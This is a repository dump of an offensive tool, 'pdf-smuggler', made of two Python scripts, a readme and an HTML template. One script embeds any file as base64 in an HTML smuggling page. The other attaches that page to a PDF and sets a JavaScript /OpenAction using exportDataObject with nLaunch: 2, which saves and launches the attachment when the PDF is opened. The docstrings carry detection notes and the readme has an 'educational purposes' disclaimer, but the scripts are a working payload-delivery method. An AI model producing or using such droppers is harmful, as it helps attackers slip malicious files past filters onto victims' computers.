├── html_smuggle.py
├── images
├── pdf_smuggler.jpg
└── placeholder.md
├── pdf-smuggler.py
├── readme.md
└── smuggle_template.html
/html_smuggle.py:
--------------------------------------------------------------------------------
1 | import base64
2 | import os
3 | import sys
4 |
def create_smuggled_html(smuggle_file):
    """Write an HTML page that carries *smuggle_file* inline as base64 text.

    Two placeholders in ``smuggle_template.html`` are filled in:
    ``INSERT BASE64 HERE`` receives the encoded file bytes and
    ``INSERT NAME OF FILE HERE`` receives the file's base name.  The
    template is opened by relative path, i.e. from the current working
    directory.  The result is written beside the input with its extension
    swapped for ``.html``, so an input that already ends in ``.html`` is
    overwritten by its own output.

    Review note (detection): how the template turns the base64 text back
    into a file is not visible from this function -- presumably script in
    the template rebuilds it in the browser; confirm against the template.
    What this function does guarantee is the artifact's shape: one HTML
    document holding the whole file as a single long base64 literal next
    to its original file name.  Content inspection therefore has to look
    inside the HTML body rather than rely on a separate download event.

    Args:
        smuggle_file: Path of the file to embed.

    Raises:
        OSError: If the input file or the template cannot be opened, or
            the output cannot be written.
    """
    # Whole file is read into memory and encoded in one go.
    with open(smuggle_file, 'rb') as source:
        encoded_payload = base64.b64encode(source.read()).decode('utf-8')

    with open('smuggle_template.html', 'r') as template_handle:
        page = template_handle.read()

    # Substitution order matches the placeholders' roles: data, then name.
    embedded_name = os.path.basename(smuggle_file)
    page = page.replace('INSERT BASE64 HERE', encoded_payload)
    page = page.replace('INSERT NAME OF FILE HERE', embedded_name)

    # Output path keeps the input's directory and stem.
    stem, _extension = os.path.splitext(smuggle_file)
    output_file = stem + '.html'
    with open(output_file, 'w') as destination:
        destination.write(page)

    print(f'Success! Smuggled HTML file "{output_file}" has been created.')
30 |
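if __name__ == '__main__':
    # Exactly one positional argument is expected: the file to embed.
    if len(sys.argv) != 2:
        # The usage line names this script and its single argument.
        print('Usage: python html_smuggle.py <file>')
        sys.exit(1)

    smuggle_file = sys.argv[1]
    create_smuggled_html(smuggle_file)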
38 |
39 |
40 |
--------------------------------------------------------------------------------
/images/pdf_smuggler.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/duckbillsecurity/pdf-smuggler/14a51ce811ddf1f610b7991dfe0546b3468f164e/images/pdf_smuggler.jpg
--------------------------------------------------------------------------------
/images/placeholder.md:
--------------------------------------------------------------------------------
1 |
2 |
--------------------------------------------------------------------------------
/pdf-smuggler.py:
--------------------------------------------------------------------------------
1 | import sys
2 | from PyPDF2 import PdfFileReader, PdfFileWriter
3 | from PyPDF2.generic import NameObject, createStringObject, DictionaryObject
4 |
def add_attachment_to_pdf(inputpdf, file, outputpdf):
    """Copy a PDF, embed *file* in it and set a JavaScript ``/OpenAction``.

    The pages of *inputpdf* are copied into a new document, *file* is added
    as an attachment under the name given (the path exactly as passed in),
    and the document catalog's ``/OpenAction`` is set to a ``/JavaScript``
    action that calls ``this.exportDataObject`` on that attachment with
    ``nLaunch: 2``.  An existing ``/OpenAction`` entry is resolved and
    updated in place rather than replaced.

    Review notes (detection and mitigation):
      * The output combines three markers a PDF scanner can key on: an
        embedded file, a catalog-level ``/OpenAction``, and an action of
        type ``/JavaScript`` whose script references ``exportDataObject``.
      * Per the Acrobat JavaScript API, ``nLaunch: 2`` asks the viewer to
        save the attachment to a temporary path and launch it; viewers
        with JavaScript disabled do not run the action at all.
      * *file* is interpolated into the script text without escaping, and
        ``_root_object`` is a private attribute of the writer.

    Args:
        inputpdf: Path of the source PDF.
        file: Path of the file to attach; also used as the attachment name.
        outputpdf: Path the resulting PDF is written to.

    Raises:
        ValueError: If any of the three arguments is empty or ``None``.
    """
    if not all((inputpdf, file, outputpdf)):
        raise ValueError("All parameters (inputpdf, file, outputpdf) are required.")

    # Start from a fresh writer holding every page of the source document.
    source_pdf = PdfFileReader(inputpdf)
    writer = PdfFileWriter()
    writer.appendPagesFromReader(source_pdf)

    # The attachment is stored under the same string the script refers to.
    with open(file, "rb") as attachment:
        writer.addAttachment(file, attachment.read())

    # Reuse the catalog's /OpenAction dictionary when one is present,
    # otherwise create one and register it.
    catalog = writer._root_object
    existing_action = catalog.get("/OpenAction")
    if existing_action is not None:
        open_action_dict = existing_action.getObject()
    else:
        open_action_dict = DictionaryObject({})
        catalog.update({NameObject("/OpenAction"): open_action_dict})

    # Action type and script body; the script names the attachment above.
    export_script = 'this.exportDataObject({ cName: "%s", nLaunch: 2 });' % file
    action_entries = {
        NameObject("/S"): NameObject("/JavaScript"),
        NameObject("/JS"): createStringObject(export_script),
    }
    open_action_dict.update(action_entries)

    with open(outputpdf, "wb") as destination:
        writer.write(destination)

    print(f'Success! PDF Smuggled HTML file "{outputpdf}" has been created.')
42 |
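if __name__ == "__main__":
    # Three positional arguments are required after the script name.
    if len(sys.argv) != 4:
        # The usage line names this script; a usage error exits non-zero,
        # matching html_smuggle.py.
        print("Usage: pdf-smuggler.py inputpdf_file attachment_file outputpdf_file")
        sys.exit(1)

    # Positional order: source PDF, file to attach, output PDF.
    inputpdf = sys.argv[1]
    file = sys.argv[2]
    outputpdf = sys.argv[3]

    add_attachment_to_pdf(inputpdf, file, outputpdf)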
55 |
--------------------------------------------------------------------------------
/readme.md:
--------------------------------------------------------------------------------
1 | ## Disclaimer
2 |
3 | Scripts are for educational and demonstration purposes only. The author does not endorse or condone the use of this script for any criminal or malicious activities and it should only be used where explicitly allowed with proper permission.
4 |
5 | ## Introduction
6 |
7 | Create PDFs that carry an HTML smuggling file as an attachment; an `/OpenAction` JavaScript action exports (saves) the attachment when the document is opened.
8 |
9 | ## Instructions
10 |
11 | 1. Create HTML smuggling file using html_smuggle.py.
12 |
13 | The mandatory parameters are:
14 |
15 | - `smugglefile`: The full file path and name of the file for HTML smuggling.
16 |
17 | Note: requires smuggle_template.html file in same location as the script.
18 |
19 | 2. Create final PDF using pdf-smuggler.py.
20 |
21 | The mandatory parameters are:
22 |
23 | - `inputpdf`: The full file path of the original PDF document.
24 | - `file`: The full file path of the file to be attached to the PDF document.
25 | - `outputpdf`: The full file path of the final created PDF document.
26 |
--------------------------------------------------------------------------------
/smuggle_template.html:
--------------------------------------------------------------------------------
1 |
2 |
3 | Check downloads folder
4 |
29 |
30 |
31 |
--------------------------------------------------------------------------------